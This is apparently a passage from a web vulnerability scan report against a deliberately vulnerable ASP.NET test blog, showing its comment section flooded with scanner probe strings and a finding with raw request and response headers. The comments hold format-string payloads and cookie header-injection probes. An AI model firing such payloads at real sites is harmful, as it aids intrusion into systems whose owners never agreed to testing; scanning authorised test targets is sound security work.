<strong>96.37.113.89</strong>12/14/2022 5:49:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:49:09 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:07 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:09 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:10 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:10 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">ZAP</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">ZAP%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">ZAP %1!s%2!s%3!s%4!s%5!s%6!s%7!s%8!s%9!s%10!s%11!s%12!s%13!s%14!s%15!s%16!s%17!s%18!s%19!s%20!s%21!n%22!n%23!n%24!n%25!n%26!n%27!n%28!n%29!n%30!n%31!n%32!n%33!n%34!n%35!n%36!n%37!n%38!n%39!n%40!n </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:34 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:06 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:37 AM</DIV><DIV class="CommentText">\|</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:37 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:38 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:19 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:19 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:19 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:19 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:19 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any? Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any? Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7 </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">any? Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7 </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:22 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:35 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:35 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:38 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:56 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:56 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:56 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:56 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" bgcolor="#E6DCCF"> <tr><td colspan="7" bgcolor="#E6B873"><font size="2"><table class="Calendar" cellspacing="0" border="0" width="100%"> <tr><td width="15%"><font size="2"><b><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></b></font></td><td align="center" width="70%"><font size="2"><b>December 2022</b></font></td><td align="right" width="15%"><font size="2"><b><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></b></font></td></tr> </table></font></td></tr><tr><th align="center" abbr="Sunday" scope="col"><font size="2">Sun</font></th><th align="center" abbr="Monday" scope="col"><font size="2">Mon</font></th><th align="center" abbr="Tuesday" scope="col"><font size="2">Tue</font></th><th align="center" abbr="Wednesday" scope="col"><font size="2">Wed</font></th><th align="center" abbr="Thursday" scope="col"><font size="2">Thu</font></th><th align="center" abbr="Friday" scope="col"><font size="2">Fri</font></th><th align="center" abbr="Saturday" scope="col"><font size="2">Sat</font></th></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></font></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Evidence
Show / hide Request and Response
Request Header - size: 428 bytes.	GET http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:25 GMT Content-Length: 14066
Response Body - size: 14,066 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" 